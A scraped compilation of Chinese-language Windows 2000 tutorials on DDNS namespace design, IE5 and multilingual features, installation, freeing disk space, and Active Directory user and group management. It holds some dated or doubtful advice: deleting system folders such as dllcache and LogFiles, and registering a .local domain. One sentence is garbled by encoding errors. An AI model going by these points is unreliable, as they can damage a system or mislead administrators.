    有了这些可供选择的方法及充分认识DDNS的灵活性后，根据DNS的设计标准，就可以决定怎样划分名称空间。但最重要的是DNS的子域和活动目录的域应匹配。如果公司有因特网业务，在设计DNS时就应该有一个更远的打算，并且判断把名称空间提交到因特网是否与内部有所不同，下面我们具体分析一下：

    为了一致性，一些公司对内部和外部的用户提供一个相同的DNS名称空间。在这种方案中，代表一个目录的单个的DDNS域，如contoso.com，它内部的资源能在防火墙的内部和外部方便地转换为IP 地址。当然，对内部和外部的用户使用单一的名称空间也有一些问题需要解决，例如，不想让因特网的每个用户都知道内部主机的纪录，不想把所有的内部IP地址在因特网上公开，以及需要提供一种方法给内部用户，实现把内部和外部资源转换为IP 地址。最好的办法是将内部资源和外部资源纪录存储在不同的区域中，让内部资源的IP地址对外部用户是不可见的，在内部和外部的区域之间没有复制，即本质上它们共享相同的域名，但它们的操作是独立的：它们都是在的DDNS服务器上不同的基本的区域。那么内部的用户怎样才能访问域外的资源呢？这有多种解决方案，较流行的方法是在防火墙的内部建立外部资源的副本，然后通过代理来访问，就好象访问内部名称一样。这种内部和外部的资源使用相同的名称空间，要有很多附加的配置，集成工作较复杂！参见示例图一

示例1

    一个有因特网业务的公司也可以有不同的内部和外部域名称。例如在防火墙内部使用contoso.local，防火墙的外部使用contoso.com，通过用不同的内部和外部名称名称空间，公司为内部资源提供保密，同时简化名称解析过程。不需要把外部服务器镜像到防火墙内部，或在外部服务器和镜像服务器之间配置代理。这种方法配置起来非常简单，公司用户可以根据FQDN来区分内部和外部的资源。这种DDNS建立的两个域名空间，都应该在因特网上单独注册。尽管contoso.local只在内部使用,但也应该注册,以防止其他人使用。否则如果被别人注册了，当内部用户把浏览器指向www. contoso.local，就有可能访问到其他的Web站点了。 参见示例2

示例2

    在设计DDNS时要衡量所有的因素。如果单位决定使用单个名称空间，则设计DDNS较复杂；如果使用不同的内部和外部空间实现起来较容易些。应多方面分析衡量，找到最适合公司需要的解决方案！

    在Windows2000网络中，由于活动目录与DNS紧密集成在一起，意味着活动目录更适合于Internet和Intranet环境。客户可以更容易更迅速地找到目录服务器；企业可以把活动目录直接连接到Internet以简化与客户和合作伙伴进行通讯和提供电子商务。活动目录安装后，它将自动通过DDNS进行发布。也就是说使用DDNS的Windows2000网络，将方便可靠地同Internet连接起来！

返回


多语言技术、IE5.0和系统的安全稳定性

《一键清理系统垃圾》

多语言技术、IE5.0和系统的安全稳定性

    Windows 2000中多语言技术的出现终于使用户能够在同一套Windows系统中查看、编辑和打印不同语言的文档，而Windows 2000 Professional的多语言版本甚至能够在同一套Windows系统中为不同的用户切换到不同语言的用户界面(包括菜单、对话框和帮助文件)。
    1．同时支持60多种语言:Windows 2000的多语言技术允许用户使用60多种语言查看、编辑和打印信息。
    2．简体中文和繁体中文的自由切换:简体中文和繁体中文由于编码的不同，造成了内地与港澳台用户交流的不便，而在Windows 2000 Professional简体中文版中，不需要安装任何其他的繁体中文支持软件，就可以方便地查看和编辑繁体中文的文档或网页。
    3．Unicode字符集:Windows 2000 Professional采用了Unicode 2.1作为基本字符集，Unicode是一个国际标准，它代表了世界上使用的主要语言中的通用字符。Unicode编码的好处是它允许数据无歧义的纯文本表示，这可以大大简化混合平台环境中的数据共享。
    要想查看和编辑其他语言的文档或网页的步骤是:进入"控制面板"的"区域设置"，选择相应的语言，Windows 2000就会安装该种语言的支持模块，然后用户就可使用了。

    强大的IE5.0

    Windows 2000中的许多方便的功能与IE5.0是分不开的，下面我们来看看与IE4.0相比，IE5.0增加了什么好的功能。
    1．能保存完整的网页内容:在IE4.0中，系统只能保存网络页面的HTML代码或页面上的文字内容。这种情况在IE5.0中得到了改善，用IE5.0中的"另存为"命令时，"文件类型"新增了一个"网页，全部"选项，选择该选项后能将当前页面中的图形和HTML编码全部下载到硬盘上，因此，在IE5.0中你可以保存完整的页面内容，而不只是页面的HTML代码或文字内容了。
    2．更强的搜索功能:IE5.0提供了更为完善的搜索工具，点击工具栏的"搜索"按钮后，你可以通过浏览器栏出现的"选择搜索"选择"在Internet上"搜索网页、网址、邮件地址、新闻组，以及公司或机构等，或者选择"所有搜索引擎列表"。你还可选择IE5.0默认Excite搜索引擎之外的其他搜索引擎进行搜索。
    3．更加面向网页设计者:事实上，IE5.0的许多增强特性是面向网页设计人员的。具备了这些特性的浏览器将允许网页设计人员以更简单方便的方式对网页进行设计和维护，而一般的用户则无法直接察觉这些特性。例如IE5.0支持DHTML（动态超文本标识语言）、XML（可扩展标识语言）、CSS（阶式表单）。此外，IE5.0还引入了一种新的文件扩展名.HTA（超文本应用程序），通过此种程序启动一个不带控制项和状态条的窗口，可使网页浏览界面更简洁。

    为移动用户考虑的脱机功能

    Windows 2000新增的离线浏览功能给用户尤其是使用笔记本电脑的移动用户提供了浏览网页的方便。这种功能能将用户想要经常访问的网页及其所有级链网页下载后离线浏览，甚至可以将一个网站及其所有级链网页下载到自己的硬盘，不过你的硬盘可要有足够的自由空间。Windows 2000的这种功能是通过IE5.0来实现的，下面介绍这种功能的具体使用。

    1.添加离线浏览网页
     (1) 在"收藏夹"菜单中单击"添加到收藏夹"命令，选中"允许脱机使用"复选框。
     (2) 单击"确定"按钮后，IE5.0就将同步化此网页，以后就可以脱机浏览了。

    2.设置脱机浏览网页
    在添加脱机浏览网页地址时，用户可以使?quot;脱机收藏夹向导"进一步设置脱机浏览的网页的同步特性，其方法是:
    (1)单击"自定义"按钮，进入"脱机收藏夹向导"中，单击"下一步"按钮，进入"脱机收藏夹向导"的设置界面。其中会出现你选择的脱机或离线浏览的网页名称及其URL地址，并且提醒如果你的硬盘没有足够的空间，可以限制下载页数（最多可下载3页）。
    (2)在下一步中，IE5.0将提示用户选择同步方式(即下载以后如何更新网页内容)，并提供了三种单项选择方式:①仅在执行"工具"菜单的"同步"命令时同步;②创建新的计划;③使用已有的计划(注意:在第一次执行此向导时，只显示前面两个选项)。
    (3)如果选择第一或第三种同步方式，在单击"下一步"后，向导会询问该网页是否需要登录密码，如果需要，则填入用户名和密码。确认密码无误后，按"完成"退出，则选择的网页离线浏览属性的设置即告完成。如果选择第二种同步化方式，即"创建新的计划"，向导将询问用枰诤问蓖礁靡常缓笤俑耐椒绞矫?quot;计划中的更新"等，接着再按前述两种同步方式的操作，即确认该网页的访问是否需要密码。最后单击"完成"按钮退出同步化设置，IE 5.0就立即开始下载或更新该网页。

    支持VLM（超大内存）

    在介绍VLM之前，我们回顾一下Windows NT 4.0内存管理的进化过程。因为Windows NT 4.0是标准的32位操作系统，32位指针能够访问的最大空间范围是2的32次方，也就是4GB。但用户的应用程序并不能使用所有的4GB空间，其中4GB的上半部分属于系统空间，操作系统的所有进程都运行在系统空间中。下半部分属于用户空间，但用户空间的最上层驻留的是系统的动态链接库（DLL），这样用户真正能够使用的空间就少于2GB。不过是这种把系统空间和用户空间分开的技术极大地增强了系统的可靠性。

    但2GB的应用程序空间对于大型企业应用来说，是远远不够的，于是微软在Windows NT Server 4.0中将用户空间调整为3GB，但是在这3GB空间中，系统动态链接库的位置并没有改变，这就是说用户的3GB空间并不是连续的，它被系统的动态链接库所隔断。

    随着计算机软硬件的飞速发展，许多大型数据库的容量达到了几百个GB，对内存的需求也大大地增加。为了更好地参与企业应用，Windows 2000对DEC Alpha平台提供了VLM支持。因为Alpha平台的所有指针和寄存器都是64位的，因此Windows 2000能够访问高达32GB的内存空间，其中最上部的2GB空间是系统空间，最下部的2GB空间是用户空间，中间的28GB也是用户空间，所有这些空间只有使用64位指针才能访问到，这就对Windows 2000的32位指针进行了64位的符号扩展。须要注意的是，中间的28GB内存空间是不可交换的，也就是说必须是物理上配置28GB内存，而不能利用硬盘上的页交换文件来进行模拟，此外VLM的I/O只能支持异步和非缓存I/O。对VLM的访问是通过VLMAPI来实现的，这些API是原有的虚拟内存管理API的扩展，但使用的指针和参数都是64位的。

    Windows 2000的加密文件系统
    Windows 2000 Professional的NTFS文件系统支持新的"加密文件系统"功能。可以加密硬盘上的重要文件，以保证用户文件的安全。只有那些通过安全的Windows NT登录的用户才能访问这些加密文件。这使得Windows 2000 Professional特别适合用作便携电脑的操作系统--即使是您的电脑丢失或被盗，数据也不会泄密。对于多人共享使用的台式机也能保护每个用户的数据的安全。EFS只规定在本地加密，如果文件被发送到网络，应该通过IPSec或其它的网络安全技术进行不同的加密操作。

    活动目录
    活动目录是Windows 2000服务器版中最重要的功能。活动目录是Windows 2000 Server可扩展和调整的目录服务。它存储有关网络对象的信息并使管理员和用户可以方便地查找和使用该信息。活动目录的目录服务将结构化数据存储作为目录信息逻辑和分层组织的基础。

返回


给Win2000减减肥

《一键清理系统垃圾》

给Win2000减减肥

      Win2000带给大家的不仅有方便，而且还有它那基于NT内核的高稳定性，不过Win2000确实太大了，像我的Win2000 Server，采用“典型安装”就占用了将近1GB的空间，有没有什么办法，给它减减肥……
    Win2000中的很多文件可以删除，我在自己的计算机上删除了下边这些文件，并且工作了将近一个月，没有很大的影响（建议你先将这些文件“剪切”到其它地方，等运行一段时间没有发现问题，再完全删除也不迟）。
    1.\WINNT\system32\dllcache
    这个目录主要是给“Windows 文件保护”使用的，Win2000所有需要保护的文件在dllcache目录中都有备份，可以完全删除，即使有问题也可以从光盘恢复。
    2.\WINNT\Fonts
    可以删除部分中文字体，系统不让删除的就不要强制删除。可节省大于30MB的磁盘空间，如果你是从事排版和美工等需要多种字体的工作，请不要删除。
    3.\WINNT\Driver Cache\i386
    可以删除，可节省50MB，在光盘上的i386目录下有备份（其实就是一个50MB的Driver.cab文件）。
    4.\WINNT\system32\LogFiles
    记录文档,可以删除。
    5.\WINNT\System32\adminpak.msi
    Win2000 Server和Win2000 Advance Server管理工具的安装程序，你可以从运行Win2000的任何计算机上远程管理服务器。Win2000管理工具包含 Microsoft管理控制台的管理单元和用于管理运行Win2000 Server的计算机的其它管理工具，这些管理工具在Win2000 Professional中是不提供的。可以删除，节省15MB空间。如果将来需要，你可以在Win2000安装光盘上的i386目录下找到它。
    6.\WINNT\help
    顾名思义就是帮助文件，因为不经常使用，删除也可以，节省30MB。（编者:强烈建议留下该目录，Win2000提供了详细的帮助文档，你如果不看实在是个遗憾。）


跟我一起安装Windows 2000

《一键清理系统垃圾》

跟我一起安装Windows 2000

安装前的说明

    感受Windows 2000当然必须从安装开始，对于一直使用Windows 95/98而没有使用过Windows NT的用户一定要注意：由于Windows 2000使用的是NT内核，所以它的安装和使用都与Windows 95/98有不小的差别，因此本文以Step by Step的方式和大家一起完成整个安装过程。

    Windows 2000的安装有两种模式：升级安装和全新安装。对于已经在自己硬盘上安装了Windows 95/98的用户，我强烈建议安装一个新的Windows 2000系统和Windows 95/98共存，而不是在原有的系统上进行升级。如此，你即使在安装或使用Windows 2000的时候有什么差错，仍然可以安全且完全的卸载Windows 2000回到以前的系统。因此，下面主要以安装一个新的Windows 2000 Professional系统来讲解整个安装过程。

全新安装Windows 2000

    1.使用Windows 2000 Professional的安装光盘启动计算机或在Windows 95/98下运行安装光盘中的“setup.exe”，在出现的窗口中选择“全新安装”并继续。

    2.安装程序接下来会进行一系列的初始化，然后出现的“欢迎使用安装程序”画面中有三个选项：回车安装Windows 2000、按“R”键修复上一次的安装错误和按“F3”退出；这里我们当然是回车安装Windows 2000。

    3.安装程序在检测启动硬盘后会要求你确认是否继续安装，按“C”继续。

    4.在按“F8”键同意Windows 2000的许可协议后，你需要选择Windows 2000将安装的硬盘分区。这里我建议大家将Windows 2000安装到一个单独的分区，用箭头键选择想要安装的分区后请回车确认。当然你也可以在这个画面中创建分区（按“C”键，）和删除分区（按“D”键）。

    5.接下来会让你选择安装Windows 2000的分区格式，这里可以选择FAT分区格式和NT所特有的NTFS分区格式。NTFS当然有更高的安全性、能够支持更大的硬盘（最大2TB），但对于一般普通用户，我建议还是使用FAT文件格式——因为目前还没有任何工具可以将Windows 2000的NTFS转化为其他的分区格式，除非用Windows 2000，但实现起来也比较复杂。如果你上一步选择的是一个FAT格式的安装分区，而你又想要使用NTFS，这里也可以实现FAT→NTFS的转换。

    6.如果是未格式化或从FAT转化为NTFS的分区，接下来会进行格式化过程。完成后安装程序会将文件复制到你的硬盘上Windows 2000的安装目录，这是一个相对漫长的过程，你可以站起来活动一下或去冲杯咖啡。

    7.当你觉得有些无所事事的时候，复制工作也差不多完成了。安装程序初始化Windows 2000配置后就会重新启动计算机，这时候，你已经可以看见Windows 2000的一些面貌，先前的等待总算没有白费，但整个安装过程还没有进行到一半。

    8.接下来是检测和安装一般设备，这时候你又可以去冲咖啡了……我一直很奇怪：既然微软始终标榜自己的产品为用户着想，那为什么不在安装的漫长等待过程中也象 Debian（一种Linux发行套件）那样做一个小游戏（俄罗斯方块）来打发无聊的时间？！

    9.你的肚子已经装满了咖啡，安装程序也总算进入了区域设置。这里建议你选择系统或用户区域部分的“自定义”，在出现的区域选项窗口中的系统语言设置里把“中文（繁体）”勾选上，这样以后你就可以直接读取Big5码的文档了 。

    10.在接下来的几个窗口中，你需要键入个人信息、系统管理员密码等资料。然后你就可以看见和Windows 95/98中一样无聊的“日期和时间设置”窗口，不必更改，直接点击“下一步”。

    11.等待Windows 2000安装网络组件之后，会让你选择“典型设置”或“自定义设置”网络，这里你可以直接选择“典型设置”，等系统安装完成后再来详细配置网络，其方法和Windows 98及NT类似。

    12.在“工作组或计算机域”设置窗口中，根据你所在局域网的网络管理员所提供的网络信息来选择，如果没在局域网中，请选择第一项。

    13.接下来是安装Windows 2000组件，这又是一个让你无所事事的过程，随便找本书来翻翻吧。

    14.安装程序在进行最后的一系列任务了，曙光在前头……

    15.你最希望看到的画面出现了，不要犹豫，赶快点击“完成”吧！

    16.第一次启动Windows 2000，系统会启动“网络标识向导”，如果只是你一个人使用这台电脑，请在“本机用户窗口”选择“要使用本机，用户必须输入用户名和密码”项，当然你也可以同时添加其他登录用户。

    17.OK，现在出现每次启动Windows 2000都会出现的画面——登录窗口，输入你先前设定的密码就可以进入Windows 2000——这里的世界很精彩！

    关于多重启动

    Windows 2000支持多重启动，和NT 4的多重启动类似，你可以在计算机启动时有选择的进入不同的操作系统。Windows 2000支持与微软的其他版本操作系统及OS/2的多重启动。

    如果安装与MS-DOS或Windows 95的多重启动，主引导分区必须是FAT16，而且要最后安装Windows 2000；如果是与Windows 98的多重启动，主引导分区可以是FAT16或FAT32，而且安装顺序谁先都可以；如果是在以前的NT 4.0多重启动的电脑上升级安装，原NT 4.0必须安装有SP4以上版本，否则无法读取原有NTFS分区。

    卸载问题

    操作系统好象还没有提供卸载的，Windows 2000自然也不例外。因此，你必须手动进行：

    对于只安装了Windows 2000的情况，当然只需要格式化引导分区再重新安装其他系统即可。

    如果是与Windows 95/98多重引导的Windows 2000，你需要先用Windows 98的启动盘向引导分区传输系统——sys c:，然后进入原Windows 98中使用Partition Magic一类的硬盘工具改变并格式化Windows 2000的NTFS分区（如果是FAT分区，就可以用Windows 98直接格式化），最后再删除C盘根目录下的boot.ini、boosect.dos和nt*.*等文件。

返回


管理计算机和用户帐号

《一键清理系统垃圾》

管理计算机和用户帐号

    在Windows2000中用户可以在活动目录用户和计算机管理工具中实现建立用户帐号、计算机帐号、组、安全策略等项。它可以用于建立或编辑网络中的用户、计算机、组、组织单位、域、域控制器、以及发布网络共享资源。活动目录用户和计算机管理器是安装在域控制器上的目录管理工具，且用户可以在Windows2000 Professional 中安装它的管理工具，以便利用客户机对活动目录进行远程管理。
本章介绍了Active Directory用户和计算机的常用管理工具的使用：
1. 账户、组、组织机构相关的基本概念
2. 用户和计算机账户的配置与管理
3. 组的创建和管理
4. 组织机构的添加与管理
5. 资源的发布和搜索
6. 域和域间信任的管理

    7.1 基本概念
    活动目录用户和计算机管理器中的帐号标识的是一个物理实体如计算机或用户，计算机和用户的帐号在它们登录到网络或访问域中的资源时提供安全信任。帐号可以用于：
§　验证计算机或用户的身份
§　允许访问域中资源
§　审核用户或计算机帐号的活动

7.1.1 用户帐号
    用户帐号能够让用户以授权的身份登录到计算机和域中并访问其中资源。用户帐号也可以作为某些软件的服务帐号。

    7.1.2 计算机帐号
    每一个运行 Windows 2000 和 Windows NT 的计算机在加入到域时都需要一个计算机帐号，就象用户帐号一样，被用来验证和审核计算机的登录过程和访问域资源。

7.1.3 组
    组是可包含用户、联系人、计算机和其他组的 Active Directory 或本机对象。使用组可以：
§　管理用户和计算机对 Active Directory 对象及其属性、网络共享位置、文件、目录、打印机列队等共享资源的访问。
§　筛选器组策略设置
§　创建电子邮件通讯组
    有两种类型的组：
§　安全组
§　通讯组
    安全组用于将用户、计算机和其他组收集到可管理的单位中。为资源（文件共享、打印机等等）指派权限时，管理员应将那些权限指派给安全组而非个别用户。权限可一次分配给这个组，而不是多次分配给单独的用户。使用组而不是单独的用户可简化网络的维护和管理。
    通讯组只能用作电子邮件的通讯组。不能用于筛选组策略设置。通讯组无安全功能。
    任何时候，组都可以从安全组转换为通讯组，反之亦然，但仅限于域处于本机模式的情况下。域处于混合模式时不能转换组。下表总结了域模式对组的作用。

7.1.4 组作用域
    每个安全组和通讯组均具有作用域，该作用域标识组在域树或树林中所应用的范围。有三类不同的作用域通用、全局和域本地。

通用作用域
全局作用域
域本地作用域

在本机模式域中，可将其成员作为来自任何域的帐户、来自任何域的全局组和来自任何域的通用组。

在本机模式域中，可将其成员作为来自相同域的帐户和来自相同域的全局组。

在本机模式域中，可将其成员作为来自任何域的帐户、全局组和通用组，以及来自相同域的域本地组。

在本机模式域中，不能创建有通用作用域的安全组。

在本机模式域中，可将其成员作为来自相同域的帐户。

在本机模式域中，可将其成员作为来自任何域的帐户和全局组。

组可被放入其他组（当域处于本机模式时）并且在任何域中指派权限。

组可被放入其他组并且在任何域中指派权限。

组可被放入其他域本地组并且仅在相同域中指派权限。

不能转换为任何其他组作用域。

只要它不是有全局作用域的任何其他组的成员，则可以转换为通用作用域。

只要它不把具有域本地作用域的其他组作为其成员，则可转换为通用作用域。

7.1.5 内置和预定义组
    安装域控制器时，部分默认的组安装于 "Active Directory 用户和计算机"控制台的"内置"和"用户"文件夹中。这些组是安全组并且代表一些公用的权利和权限集合，可用于将某些角色、权利和权限授予用户放入默认组的帐户和组。
    有域本地作用域的默认组放在"内置"文件夹中。有全局作用域的预定义组放在"用户"文件夹中。可将内置和预定义组移动到域中的其他组或组织单位文件夹，但不能将它们移动至其他域。

内置组：
    放入"Active Directory 用户和计算机"的"内置"文件夹中的默认组为：帐户操作员 、管理员 、备份操作员 、来宾 、打印操作员 、复制器 、服务器操作员、用户 。下表显示了这些组拥有的默认权利：

用户权利
允许
在默认情况下分配有此权利的组

从网络访问该计算机
连接到网上的计算机。
管理员、每个人、超级用户

备份文件和文件夹
备份文件和文件夹该权利将取代文件和文件夹权限
管理员、备份操作员

旁路遍历检查
即使用户没有访问父文件夹的权限，也可在文件夹之间移动以访问文件。
每个人

更改系统时间
设置计算机内部时钟的时间。
管理员、超级用户

创建页面文件
该权利无效。
管理员

调试程序
调试各种底层对象，例如线程。
管理员

从远程系统强制关机
关闭远程计算机。
管理员

增加调度优先级
提高进程的执行优先级。
管理员、超级用户

加载和卸载设备驱动程序
安装和删除设备驱动程序。
管理员

内置组：(续表)

本地登录
通过计算机键盘在计算机上登录。
管理员、备份操作员、每个人、来宾、超级用户和用户

管理审计和安全日志
指定需要审计的资源访问（诸如文件访问）类型，并且查看和清除安全日志。该权利不允许用户设置系统审计策略。管理员组的成员始终可以查看和清除安全日志。
管理员

修改固件环境变量
修改存储于支持此类配置的计算机非易失内存中的系统环境变量。
管理员

图示单独的进程
用图表的形式显示某个进程的情况（性能数据采集）
管理员、超级用户

图示文件系统性能
用图表的形式显示计算机的情况（性能数据采集）
管理员

内置组：(续表)

还原文件和文件文件夹
恢复备份文件和文件文件夹该权利将取代文件和目录权限
管理员、备份操作员

关闭系统
关闭 Windows 2000
管理员、备份操作员、每个人、超级用户和用户

取得文件或其他对象的所有权
取得文件、文件夹、打印机和计算机上（或连接在计算机上）的其他对象的所有权。该权利将取代保护对象的权限。有关文件和文件夹权限的信息。
管理员

预定义组：
    放在"Active Directory 用户和计算机"的"用户"文件夹中的预定义组有：组名称 、证书发行者 、域管理器 、域计算机 、域控制器 、域来宾 、域用户 、企业管理员 、组策略管理员、架构管理员 。可使用这些有全局作用域的组将该域中各种类型的用户帐户（普通用户、管理员和来宾）收集到组中。然后这些组可以放入该域和其他域中有域本地作用域的组。

7.1.6 特殊身份
    除"内置"和"用户"文件夹中的组以外，Windows 2000 Server 还包括几种特殊身份：为方便起见，这些身份通称为组。这些特殊组没有用户可修改的特别成员身份，但是它们能根据环境在不同时间代表不同用户。这三个特殊组为：
§　每个人
  代表所有当前网络的用户，包括来自其他域的来宾和用户。无论用户何时登录到网络上，它们都将被自动添加到 Everyone 组。
§　网络
    代表当前通过网络访问给定资源的用户（不是通过从本地登录到资源所在的计算机来访问资源的用户）。无论用户何时通过网络访问给定的资源，它们都将自动添加到网络组。
§　交互
    代表当前登录到特定计算机上并且访问该计算机上给定资源的所有用户（不是通过网络访问资源的用户）。无论用户何时访问当前登录的计算机上所给的资源，它们都被自动添加到交互组。

7.1.7 组对网络性能影响
    用户登录到 Windows 2000 网络时，Windows 2000 域控制器决定用户属于哪个组。Windows 2000 创建安全令牌并将其指派给用户。安全令牌列出了用户帐户 ID 和用户所属的所有安全组的安全 ID。组成员身份可能影响网络性能，由于：
§　登录的影响
    建立安全令牌需要时间，所以用户所属的安全组越多，生成这个用户安全令牌的时间越长，并且该用户登录到网络的时间也越长。造成这一影响的程度将随着网络带宽以及处理登录过程的域控制器的配置而变化。
    有时，用户可能想创建只用于电子邮件的组，并不准备使用该组将权利和权限指派给它的成员。为提高登录性能，可创建类似通讯组的组而非安全组。

§　有通用作用域的组的复制
    对存储在全局编录中的数据的更改将复制到树林的每个全局编录中。有通用作用域的组及其成员列在全局编录中。有通用作用域的组的一个成员更改时，整个组成员身份都必须复制到域树或树林中的所有全局编录中。
    具有全局或域本地作用域的组也列在全局编录中，但未列出其成员。这将会减小全局编录的大小，并且明显减少需要随时更新全局编录的复制通信量。可通过为经常更改的目录对象使用具有全局或域本地作用域的组来提高网络性能。
§　网络带宽
    每个用户的安全令牌都被发送到用户访问的每台计算机，以使目标计算机能够对照该计算机上所有资源的权限列表比较包含在令牌内的所有安全 ID，从而决定用户在该计算机上是否有相应的权利或权限。目标计算机还检查令牌中的任何安全 ID 是否属于目标计算机上的任何本地组。
    用户所属的组越多，其安全令牌就越大。如果用户的网络有大量用户，这些大型安全令牌对网络带宽和域控制器处理能力的影响非常明显。

7.2 用户账户的管理
    7.2.1 添加用户帐号
    在 Windows2000 Server 中，一个用户帐号包含了用户的名称、密码、所属组、个人信息、通讯方式等信息，在添加一个用户帐号后，它被自动分配一个安全标识 SID ,这个标识是唯一的，即使帐号被删除，它的 SID 仍然保留，如果在域中再添加一个相同名称的帐号，它将被分配一个新的 SID，在域中利用帐号的SID来决定用户的权限。
    添加用户帐号的步骤如下：
    步骤1 首选启动 Active Directry 用户和计算机管理器→单击 User 容器会看到在安装 Active Directry 时自动建立的用户帐号
    步骤2 单击操作→新建→用户→在创建新对象对话框中输入

用户的姓名、登录名，其中的下层登录名是指当用户从运行 WindowsNT/98 等以前版本的操作系统的计算机登录网络所使用的用户名 如图 7.1→下一步

步骤3 在密码对话框中输入密码或不填写密码并选择"用户下次登录时须更改密码"选项，以便让用户在第一次登录时修改密码
    步骤4 在完成对话框中会显示以上设置的信息，单击完成
    这时用户会在管理器中看到新添加的用户 如图 7.2。

7.2.2. 管理用户账户
§　输入用户的信息
    在用户属性对话框中的常规标签中可以输入有关用户的描述、办公室、电话、电子邮件地址及个人主页地址；在地址标签中输入用户的所在地区及通信地址；在电话/备注标签中输入有关用户的家庭电话、寻呼机、移动电话、传真、IP 电话及相关备注信息。这样便于用户以后在活动目录中查找用户并获得相关信息。
§　用户环境的设置
    用户可以设置每一个用户的环境，如用户配置文件、登录脚本、宿主目录等，这些设置根据实际情况而定，用

户将在以后章节加以详细说明。
§　设置用户登录时间
    在帐户标签中单击"登录时间"按钮，出现如图 7.3对话框所示，图中横轴每个方块代表一小时，纵轴每个方块代表一天，蓝色方块表示允许用户使用的时间，空白方块表示该时间不允许用户使用，默认为在所有时间均允许用户使用。在这个例子中用户设置允许用户在每星期的周一到周五的 7：00~19：00 之间使用。

步骤：在用户（Mark Lee）的登录时段对话框中，选择不允许登录的时间段单击"拒绝登录"
    当用户在允许登录的时间段内登录到网络中，并且一直持续到超过允许登录的时间时，用户可以继续连接使用，但不允许作新的连接，如果用户注销后，则无法再次登录。
§　限制用户由某台客户机登录
    在帐户并且中单击"登录到"按钮出现如图 7.4对话框所示，在默认情况下用户可以从所有的客户机登录，也可以设置让用户从某些工作站登录，设置时输入计算机的计算机名称（NetBIOS名），然后单击添加按钮，这些设置对于非 WindowsNT/2000 工作站是无效的，如用户可以不受限制的从任何一台 DOS、Windows 客户机登录。

§　设置帐户的有效期限
    在帐户并且的下方，用户可以选择帐户的使用期限，在默认情况下帐户是永久有效的，但对于临时员工来说，设置帐户的有效期限就非常有用，在有效期限到期后，该帐户被标记为失效，默认为一个月。
§　管理用户帐户
    在创建用户帐号后，可以根据需要对帐户进行密码重新设置、修改、重命名等操作。
重设密码：　选择用户帐户→操作→重设密码，在密码设置对话框中输入新的密码，如果要求用户在下次登录时修改密码则选中"用户下次登录时须更改密码"选项
帐户的移动：　选择用户帐号→操作→移动，在移动对话框中选择相应的容器或组织单位
重命名： 　选择帐户→操作→重命名，更改用户的名称，对内置的帐户也可以更改，（如更改系统管理员的帐户名称，这样有利于提高系统的安全性），在更改名称后，由于该帐户的安全标识 SID 并未被修改，所以，其帐户的属性、权限等设置均未发生改变。
删除帐户：　选择帐户→操作→删除，用户可以一次删除一个或多个帐户，在删除帐户后如再添加一个相同名称的帐户，由于 SID 的不同，它无法继承已被删除帐户的属性和权限。

§　计算机帐户的创建
    步骤1 首选启动 Active Directry 用户和计算机管理器→单击 Computer 容器→操作→计算机，则出现如图7.5所示
    步骤2 输入计算机名称，单击确定完成创建工作

7.3 组的管理
    用户可以利用将用户加入到组中的方式，简化网络的管理工作。当用户对组设置了权限后，则组中所有的用户就具有了该权限，这样避免用户对每一个用户设置权限，从而减轻了工作量。
1.添加组
    步骤1 打开 Active Directory 用户和计算机
    步骤2 在控制台树中，双击域节点
    步骤3 右键单击要添加组的文件夹，指向"新建"，然后单击"组"
    步骤4 键入新组的名称在默认情况下，用户输入的名称还将作为新组的 Windows 2000 以前版本的名称如图7.6。

    步骤5 单击所需的"组作用域"。
    步骤6 单击所需的"组类型"。
    注意：如果用户目前创建的组所属的域处于混合模式，则只能选择具有"域本地"或"全局"作用域的安全组。

2.指定用户隶属的组
    步骤： 在组属性对话框中单击成员属于标签如图 7.7,可以查看到当前用户隶属于那些组，如要将用户添加到其它的组中则单击添加按钮，出现如图 7.8所示的对话框，在上方的窗体中选择需要添加的组（可以按住 Shift 或 Ctrl 键，利用鼠标选择多个组），然后单击添加按钮则所选的组会出现在下方的窗体中，单击确定。

如果需要将用户从他所属的指定组中删除，则在成员属于窗体中选择该组，单击删除按钮。注意，用户帐号至少隶属于一个组，该组被称为主要组，这个主要组必须是一个全局组且它不可删除。

3.管理组
将组转换为另一种组类型
    步骤1 打开 Active Directory 用户和计算机
    步骤2 在控制台树中，双击域节点
    步骤3 单击包含该组的文件夹
    步骤4 在详细信息窗格中，右键单击组，然后单击"属性"
    步骤5 在"常规"选项卡的"组类型"中，单击"分布式"或"安全式 "
更改组作用域
    步骤1 打开 Active Directory 用户和计算机
    步骤2 在控制台树中，双击域节点。
    步骤3 单击包含组的文件夹
    步骤4 在详细信息窗格中，右键单击组，然后单击"属性"。
    步骤5 在"常规"选项卡的"组作用域"下，单击"本地域"、"全局"或"通用"。
删除组
    步骤1 打开 Active Directory 用户和计算机。
    步骤2 在控制台树中，双击域节点。
    步骤3 单击包含组的文件夹。
    步骤4 在详细信息窗格中，右键单击组，然后单击"删除"。

返回页首>>>

    7.4 组织单位的管理
1.创建组织单位
    步骤1 打开 Active Directory 用户和计算机
    步骤2 在控制台树中，双击域节点。
    步骤3 右键单击域节点或者要在其中添加组织单位的组织单位。
    步骤4 指向"新建"，然后单击"组织单位"。
    步骤5 键入组织单位的名称 如图 7.9。

2.组织单位的委派控制
    步骤1 打开 Active Directory 用户和计算机
    步骤2 在控制台树中，双击域节点
    步骤3 在详细信息窗格中，右键单击该组织单位，然后单击"委派控制"来启动控制委派向导
    步骤4 在用户和组对话框中，但击"添加"选择受委派的用户和组
    步骤5 在委派任务中，可以指定委派公用任务，也可以选择委派更为细化的自定义任务，如图 7.10
    步骤6 在摘要信息单击"完成"
    注：有关委派控制的概念，参见第六章的 6.2.1 Active Directory 的规划一节

  7.5 资源发布的管理
1. 资源的发布
    公布共享文件夹
步骤1 打开 Active Directory 用户和计算机
步骤2 在控制台树中，双击域节点。
步骤3 右键单击想在其中添加共享文件夹的文件夹，指向"新建"并单击"共享文件夹"。
步骤4 键入文件夹的名称
步骤5 键入用户想在目录中公布的 UNC 名称
    公布 Windows NT 打印机
步骤1 打开 Active Directory 用户和计算机
步骤2 在控制台树中，双击域节点。
步骤3 在控制台树中，右键单击想在其中公布打印机的文件夹，指向"新建"，并单击"打印机"。
步骤4 键入用户想在目录中公布的 UNC 名称。

2.资源的查找
    执行自定义搜索
步骤1 打开 Active Directory 用户和计算机
步骤2 在控制台树中，右键单击域节点，然后单击"查找"。
步骤3 在"查找"中，单击"自定义搜索"。
步骤4 单击"字段"，指向要搜索的对象种类，然后单击要为其指定搜索值的对象的属性。
步骤5 在"条件"中，单击搜索的条件。
步骤6 在"值"中，键入要应用搜索条件的属性值。
步骤7 单击"添加"，将该搜索条件添加至自定义搜索。
